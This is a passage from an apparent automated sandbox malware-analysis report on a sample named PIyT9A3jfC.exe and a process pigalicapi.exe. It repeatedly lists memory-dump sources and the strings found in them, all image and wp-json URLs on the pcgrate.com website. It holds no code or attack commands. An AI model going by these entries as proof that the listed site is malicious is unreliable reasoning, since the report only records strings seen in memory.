                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/1920px-Raytheon.svg_-1-e1626285787717.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/Huawei-Logowine-1.png
                  Source: pigalicapi.exe, 00000003.00000003.669232158.0000000004E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/IIG_logo-5.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/Newport-logo-76F09AD2F3-seeklogo.com_-e1626287837846.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/about-150x150.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/about-200x200.jpg
                  Source: pigalicapi.exe, 00000003.00000003.669232158.0000000004E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/about-300x298.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/about.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/bae_systems-1.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/horiba_1.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/logo_01-1.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-json/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.pcgrate.com%2F
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.pcgrate.com%2F&#038;format=xm
